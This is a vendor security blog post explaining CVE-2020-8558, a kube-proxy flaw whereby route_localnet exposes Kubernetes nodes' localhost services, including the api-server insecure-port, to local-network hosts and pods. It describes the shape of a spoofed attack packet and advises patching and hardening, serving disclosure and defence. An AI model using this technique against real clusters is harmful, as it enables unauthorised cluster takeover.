This post is also available in: 日本語 (Japanese)
Executive Summary
A security issue assigned CVE-2020-8558 was recently discovered in the kube-proxy, a networking component running on Kubernetes nodes. The issue exposed internal services of Kubernetes nodes, often run without authentication. On certain Kubernetes deployments, this could have exposed the api-server, allowing an unauthenticated attacker to gain complete control over the cluster. An attacker with this sort of access could steal information, deploy crypto miners or remove existing services altogether.
The vulnerability exposed nodes’ localhost services – services meant to be accessible only from the node itself – to hosts on the local network and to pods running on the node. Localhost bound services expect that only trusted, local processes can interact with them, and thus often serve requests without authentication. If your nodes run localhost services without enforcing authentication, you are affected.
The issue details were made public on April 18, 2020, and a patch released on June 1, 2020. We worked to assess additional impact to Kubernetes clusters and found that some Kubernetes installations don’t disable the api-server insecure-port, which is normally only accessible from within the master node. Exploiting CVE-2020-8558, attackers can gain access to the insecure-port and gain full control over the cluster.
We alerted the Kubernetes security team of the potential impact of this vulnerability. In turn, the team rated the vulnerability’s impact as High in clusters where the api-server insecure-port is enabled, and otherwise Medium. Luckily, CVE-2020-8558’s impact is somewhat reduced on most hosted Kubernetes services like Azure Kubernetes Service (AKS), Amazon’s Elastic Kubernetes Service (EKS) and Google Kubernetes Engine (GKE). CVE-2020-8558 was patched in Kubernetes versions v1.18.4, v1.17.7, and v1.16.11 (released June 17, 2020). All users are encouraged to update.
Prisma Cloud customers are protected from this vulnerability through the capabilities described in the Conclusion section.
The kube-proxy
kube-proxy is a network proxy running on each node in a Kubernetes cluster. Its job is to manage connectivity among pods and services. Kubernetes services expose a single clusterIP, but may consist of multiple backing pods to enable load balancing. A service may consist of three pods – each with its own IP address – but will expose only one clusterIP, for example, 10.0.0.1. Pods accessing that service will send packets to its clusterIP, 10.0.0.1, but must somehow be redirected to one of the pods behind the service abstraction.
That’s where the kube-proxy comes in. It sets up routing tables on each node, so that requests targeting a service will be correctly routed to one of the pods backing that service. It’s commonly deployed as a static pod or as part of a DaemonSet.
GKE’s documentation has further details, if you're interested.
There are networking solutions, such as Cilium, that could be configured to fully replace the kube-proxy.
The Culprit Is route_localnet
As part of its job, the kube-proxy configures several network parameters through sysctl files. One of those is net.ipv4.conf.all.route_localnet – the culprit behind this vulnerability. Sysctl documentation states, "route_localnet: Do not consider loopback addresses as martian source or destination while routing. This enables the use of 127/8 for local routing purposes. default FALSE."
Let’s unpack that explanation. For IPv4, the loopback addresses consist of the 127.0.0.0/8 address block (127.0.0.1-127.255.255.255), while commonly only 127.0.0.1 is used and has the hostname “localhost” mapped to it. Those are addresses used by your machine to refer to itself. Packets targeting a local service will be sent to IP 127.0.0.1 through the loopback network interface, with their source IP set to 127.0.0.1 as well.
Setting route_localnet instructs the kernel to not define 127.0.0.1/8 IP addresses as martian. What does “martian” mean in this context? Well, some packets arrive at a network interface and make claims about their source or destination IP that just don’t make sense. For example, a packet could arrive with a source IP of 255.255.255.255. That packet shouldn’t exist: 255.255.255.255 can’t identify a host, it’s a reserved address used to indicate broadcast. So what’s going on? Your kernel can’t know for sure and has no choice but to conclude the packet came from Mars and should be dropped.
Martian packets often hint that someone malicious on the network is trying to attack you. In the example above, the attacker may want your service to respond to IP 255.255.255.255, broadcasting the response. A fishy destination IP can also cause a packet to be deemed martian, such as a packet arriving at an external network interface with a destination IP of 127.0.0.1. Again, that packet doesn’t make sense – 127.0.0.1 is used for internal communication through the loopback interface and shouldn’t arrive from a network-facing interface. For more details on martian packets, refer to RFC 1812.
In some complicated routing scenarios, you might want the kernel to let certain martian packets pass through. That’s what route_localnet is used for. It instructs the kernel not to consider 127.0.0.0/8 as martian addresses (as it normally would, like in the case discussed in the previous paragraph). The kube-proxy enables route_localnet to support a bunch of routing magic that I won’t get into, but route_localnet is disabled by default for a reason. Unless proper mitigation is set up alongside it, attackers on the local network could exploit route_localnet to perform several attacks. The most impactful is reaching localhost bound services.
Localhost-only Services
Linux allows processes to listen only on a specific IP address so that they can bind themselves to the address of a network interface. Internal services often use that feature to listen only on 127.0.0.1. Normally, this ensures that only local processes can access the service, as only they can reach 127.0.0.1. This assumption is broken with route_localnet, since it allows external packets destined for 127.0.0.0/8. That’s highly concerning given internal services tend not to enforce authentication, expecting external packets will not reach them.
Reaching Internal Services
An attacker attempting to reach the victim’s internal services would need to construct a malicious packet where the destination IP address is set to 127.0.0.1 and the destination MAC address is set to the victim's MAC address. Without a meaningful destination IP, the attacker’s packet only relies on layer 2 (MAC-based) routing to reach the victim and is thus limited to the local network. Therefore, even if a victim enabled route_localnet, only attackers on the local network could access the victim’s localhost services.
When the victim machine receives the malicious packet, it will let it pass because of route_localnet. Since the packet has a destination IP of 127.0.0.1, it would be eligible to access localhost services. Table 1 shows what a malicious packet may look like. The attacker’s IP is 10.0.0.1 with MAC address XXX, and the target IP is 10.0.0.0.2 with MAC address YYY. The target is running a localhost-only service on port 1234.
src mac |
XXX | dst mac | YYY |
src ip | 10.0.0.1 | dst ip | 127.0.0.1 |
src port | random | dst port | 1234 |
Figure 1. A packet exploiting route_localnet
The attacker sends the packet with his IP address to ensure he receives the target’s responses. To summarize, route_localnet allows attackers on the local network to access a host’s internal services with packets like the one shown above.
Back to the Kubernetes Vulnerability (CVE-2020-8558)
Because of kube-proxy, every node in the cluster has route_localnet enabled. As a result, every host on a node’s local network could gain access to the node’s internal services. If your nodes run internal services without authentication, you are affected.
Aside from neighboring hosts on a node's local network, pods running on the node could also access its internal services. To be clear, a pod can only reach the internal services of the node hosting it. To carry out the attack, the pod must possess the CAP_NET_RAW capability. Unfortunately, Kubernetes grants this capability by default.
When we examined this issue, we tried to identify localhost services that are natively deployed by Kubernetes. We found that by default, the Kubenetes API server serves unauthenticated requests on localhost through a port dubbed the insecure-port. The insecure-port exists to allow other control-plane components running on the master (such as etcd) to easily talk with the api-server. Role-based access control (RBAC) or any other authorization mechanisms are not enforced on that port. Kubernetes installations frequently run the api-server as a pod on the master node, meaning it is running alongside a kube-proxy that has enabled route_localnet.
Alarmingly, this means that if your Kubernetes deployment didn’t disable the insecure-port, hosts on the master node’s local network could exploit CVE-2020-8558 to command the api-server and gain complete control over the cluster.
Managed Kubernetes
Managed Kubernetes platforms such as GKE, EKS and AKS are better protected against CVE-2020-8558.
To begin with, the virtual networks of some cloud service providers (CSPs), such as Microsoft Azure, don’t support layer-2 semantics and MAC-based routing. You can easily see how this manifests – every AKS machine has the same MAC address: 12:34:56:78:9A:BC. This mitigates exploitation of CVE-2020-8558 from other hosts on a node’s local network, but malicious pods possessing CAP_NET_RAW should still be able to carry out the attack.
Cloud-hosted Kubernetes offerings also tend to manage the Kubernetes control plane and api-server for you and run them on a separate network from the rest of the cluster. This protects the api-server, as it isn’t exposed to the rest of the cluster. Even if a CSP would run the api-server without disabling the insecure-port, attackers in the cluster wouldn’t be able to access it as they don’t run in the same local network.
Still, if your CSP virtual network does support layer-2 routing, malicious hosts in your cluster’s network could access localhost services on the worker nodes.
The Fix
The initial fix actually resides in the kubelet and adds mitigations around route_localnet: routing rules that cause nodes to drop external packets destined for 127.0.0.1. At the time of writing this post, route_localnet is still enabled by the kube-proxy. There are ongoing discussions about disabling it.
Even with those mitigations applied, there’s still a special case where a local network attacker could send packets to nodes’ internal UDP services. However, the attack only works if the victim node disables reverse path filtering (which normally isn't case), and in this circumstance the attacker won’t be able to get the response. A patch is being developed, but it may be dropped as the attack depends on an insecure setting (rp_filter=0).
Am I Affected?
If all of the below are true, your cluster is vulnerable to CVE-2020-8558:
- Your cluster is running a vulnerable version (earlier than v1.18.4, v1.17.7, and v1.16.11).
- Note that while the issue originated from the kube-proxy, the patch is in the kubelet.
- Your nodes have the kube-proxy running on them.
- Your nodes (or hostnetwork pods) run localhost-only services which don’t require any further authentication.
Additionally, if the following is also true, your cluster may be vulnerable to a complete takeover through the api-server insecure-port:
- Your cluster doesn’t disable the api-server insecure-port via --insecure-port=0
- The api-server runs on a node alongside a kube-proxy, for example, in deployments where the api-server is a pod itself.
A node could be attacked either by a malicious host on the local network or by a malicious pod with CAP_NET_RAW running on the node.
Conclusion
CVE-2020-8558 can have some serious consequences. You should patch your clusters as soon as possible. CVE-2020-8558 also serves as a reminder that security best practices do work and significantly reduce attack surface. You should disable the api-server insecure-port, and if your pods don’t require CAP_NET_RAW, there’s no reason they should have that capability. While not related to this specific issue, we recommend implementing other security recommendations such as RBAC or running containers as a non-root user.
Palo Alto Networks Prisma Cloud customers are protected from this vulnerability. Compliance rules ensure your clusters are configured securely, blocking or alerting on:
- The api-server insecure port
- Pods running with CAP_NEW_RAW